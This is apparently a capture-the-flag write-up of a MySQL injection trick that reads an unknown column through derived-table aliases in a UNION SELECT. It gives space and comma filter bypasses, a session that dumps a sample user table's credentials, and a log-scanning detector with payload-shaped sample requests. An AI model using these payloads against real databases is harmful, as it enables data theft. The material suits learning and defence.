This article explains how MySQL can be used to work around an unknown column name. It walks through a detailed example session for reference, and should be useful to anyone learning MySQL.
Preface
This article covers question 5 of DDCTF, a trick for getting around unknown column names. I reproduced it on my own machine; the approach is neat and clear, so I am sharing it here. The details follow:
Approach
The challenge filters spaces and commas. A space can be replaced with %0a, %0b, %0c, %0d or %a0, or avoided altogether by using parentheses; a comma can be replaced with join.
The name of the column holding the flag is unknown, and the hex-encoded table name is filtered as well, so information_schema.columns cannot be used to recover the column names. At this point a MySQL feature can be used instead; the process is as follows.
The idea is to fetch the flag in a way that makes it appear under a column name that is already known.
Example session:
mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| a | b | c | d |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d;
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
| 1 | 2 | 3 | 4 |
+---+---+---+---+
1 row in set (0.00 sec)

mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user;
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
+---+-------+----------+-------------+
| 1 | 2     | 3        | 4           |
| 1 | admin | admin888 | 110@110.com |
| 2 | test  | test123  | 119@119.com |
| 3 | cs    | cs123    | 120@120.com |
+---+-------+----------+-------------+
4 rows in set (0.01 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e;
+-------------+
| 4           |
+-------------+
| 4           |
| 110@110.com |
| 119@119.com |
| 120@120.com |
+-------------+
4 rows in set (0.03 sec)

mysql> select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3;
+-------------+
| 4           |
+-------------+
| 120@120.com |
+-------------+
1 row in set (0.01 sec)

mysql> select * from user where id=1 union select (select e.4 from (select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d union select * from user)e limit 1 offset 3)f,(select 1)g,(select 1)h,(select 1)i;
+-------------+----------+----------+-------------+
| id          | username | password | email       |
+-------------+----------+----------+-------------+
| 1           | admin    | admin888 | 110@110.com |
| 120@120.com | 1        | 1        | 1           |
+-------------+----------+----------+-------------+
2 rows in set (0.04 sec)
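On the defensive side, the shapes used above are distinctive enough to flag in web access logs. The following Python is an added example, not part of the original write-up or the challenge: it URL-decodes the query string of constructed log lines and reports the space substitutes, the join-for-comma trick, the (select N)alias derived tables and the e.N numeric-alias reference; the log lines and rule names are my own.

```python
import re
from urllib.parse import unquote, urlsplit

# Characters the write-up lists as stand-ins for a filtered space.
SPACE_SUBSTITUTES = {"\n": "%0a", "\x0b": "%0b", "\x0c": "%0c", "\r": "%0d", "\xa0": "%a0"}

# Shapes of the column-name-free UNION from the write-up. Python's \s matches
# every substitute above (U+00A0 included), so one regex covers all separators.
RULES = {
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    # (select 1)a : a derived table used to mint a known column name
    "derived_table_alias": re.compile(r"\(\s*select\s+\d+\s*\)\s*[a-z_]\w*", re.I),
    # e.4 : a column addressed through an alias that is a bare number
    "numeric_alias_ref": re.compile(r"\b[a-z_]\w*\.\d+\b", re.I),
    # )a join ( : join standing in for a filtered comma between derived tables
    "join_for_comma": re.compile(r"\)\s*[a-z_]\w*\s+join\s*\(", re.I),
}

# Constructed access-log lines (not from the article): two benign, two carrying the payload shapes.
SAMPLE_LOGS = [
    "GET /user.php?id=1 HTTP/1.1",
    "GET /search.php?q=hello%20world&page=2 HTTP/1.1",
    "GET /user.php?id=1%0aunion%0aselect%0a*%0afrom%0a(select%0a1)a%0ajoin%0a(select%0a2)b HTTP/1.1",
    "GET /user.php?id=1%a0union%a0select%a0e.4%a0from%a0(select%a0*%a0from%a0(select%a01)a,(select%a02)b)e HTTP/1.1",
]

def decode_query(line: str) -> str:
    """Query string of a 'METHOD /path?qs HTTP/x' line, URL-decoded as latin-1 so %a0 becomes U+00A0."""
    parts = line.split(" ", 2)
    if len(parts) < 2:
        return ""
    return unquote(urlsplit(parts[1]).query, encoding="latin-1")

def analyze(line: str) -> dict:
    """Return the indicators present in one log line (empty dict if clean)."""
    qs = decode_query(line)
    findings = {}
    subs = sorted({SPACE_SUBSTITUTES[c] for c in qs if c in SPACE_SUBSTITUTES})
    if subs:
        findings["space_substitutes"] = subs
    for name, rx in RULES.items():
        match = rx.search(qs)
        if match:
            findings[name] = match.group(0)
    return findings

def scan(lines):
    """Return (line, findings) for every line that trips at least one rule."""
    return [(ln, f) for ln in lines if (f := analyze(ln))]
```

Running scan(SAMPLE_LOGS) flags only the two payload lines; the benign requests, including the one with an ordinary %20 space, produce no findings.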
Summary
? 版權(quán)聲明
文章版權(quán)歸作者所有,未經(jīng)允許請勿轉(zhuǎn)載。
THE END